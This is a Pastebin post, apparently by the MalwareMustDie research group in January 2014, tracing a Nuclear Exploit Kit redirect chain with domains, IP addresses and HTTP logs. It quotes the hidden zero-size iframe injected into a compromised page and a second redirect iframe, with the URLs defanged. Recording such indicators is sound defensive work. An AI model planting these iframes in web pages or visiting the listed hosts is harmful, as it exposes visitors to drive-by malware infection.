API tools faq
paste
Advertisement
MalwareMustDie

#Nuclear EK infection domain chains..

MalwareMustDie
Jan 16th, 2014
1,979
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.43 KB | None | 0 0
raw download clone embed print report
  1. # MalwareMustDie | Nuclear Exploit infection domain chains..(in investigation)
  2. # *.hak.su / wen.ru (178.218.210.188)
  3. # vubetw.com/* (95.211.52.50)
  4. # sk6ev8d.fielderpercussionist.pw/* (192.95.10.211)
  5. # pic: http://box.jisko.net/i/965eec32.png
  6. # Thursday January 16 2014 -- 19:13:36 +02:00
  7. # credit: mak`
  8.  
  9. Lead:
  10. h00p://jp.hak.su
  11.  
  12. // forwarded to...
  13.  
  14. GET / HTTP/1.1
  15. Accept: text/html, application/xhtml+xml, */*
  16. Referer: h00p://www.google.com
  17. Accept-Language: en-US
  18. User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
  19. Accept-Encoding: gzip, deflate
  20. Host: jp.hak.su
  21. Connection: Keep-Alive
  22.  
  23. HTTP/1.1 200 OK
  24. Server: WEN.RU httpD 3.7
  25. Content-Type: text/html; charset=utf-8
  26. Date: Thu, 16 Jan 2014 16:06:48 GMT
  27. Last-Modified: Thu, 16 Jan 2014 12:36:22 GMT
  28. Accept-Ranges: bytes
  29. Connection: close
  30. Cache-Control: no-cache, max-age=0
  31. Pragma: no-cache
  32. Expires: Wed, 15 Jan 2014 16:06:48 GMT
  33. Content-Length: 291
  34.  
  35. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta h00p-equiv="Content-Type" content="text/html; charset=utf-8">
  36. <title>jp.hak.su</title></head><body>
  37. <p align="center">
  38. </p></body></html> <iframe src="h00p://vubetw.com/jp.php" width="0" height="0"></iframe>
  39.  
  40. // forwarded to:
  41.  
  42. less jp.php
  43. <iframe width=10 height=10 src="h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html"></iframe>
  44.  
  45.  
  46. //Fetch
  47.  
  48. --2014-01-17 01:30:40-- h00p://sk6ev8d.fielderpercussionist.pw/69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html
  49. Resolving sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)... 192.95.10.211
  50. Caching sk6ev8d.fielderpercussionist.pw => 192.95.10.211
  51. Connecting to sk6ev8d.fielderpercussionist.pw (sk6ev8d.fielderpercussionist.pw)|192.95.10.211|:80... connected.
  52.  
  53. GET /69e33c-2dbS87-09_06Y6c7X2d0_19Wa8c-4682a4/70/38201690f2b69d4483bd4893d72c0ee8.html h00p/1.1
  54. Referer: h00p://vubetw.com/jp.php
  55. Host: sk6ev8d.fielderpercussionist.pw
  56. HTTP request sent, awaiting response...
  57.  
  58. HTTP/1.1 200 OK
  59. Server: nginx/0.7.67
  60. Date: Thu, 16 Jan 2014 16:30:45 GMT
  61. Content-Type: text/html
  62. Connection: keep-alive
  63. X-Powered-By: PHP/5.3.27
  64. Vary: Accept-Encoding,User-Agent
  65. Content-Length: 3
  66.  
  67. 200 OK
  68. Length: 3 [text/html]
  69. Saving to: '38201690f2b69d4483bd4893d72c0ee8.html'
  70. 2014-01-17 01:30:41 (56.4 KB/s) - '38201690f2b69d4483bd4893d72c0ee8.html' saved
  71.  
  72. ---
  73. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!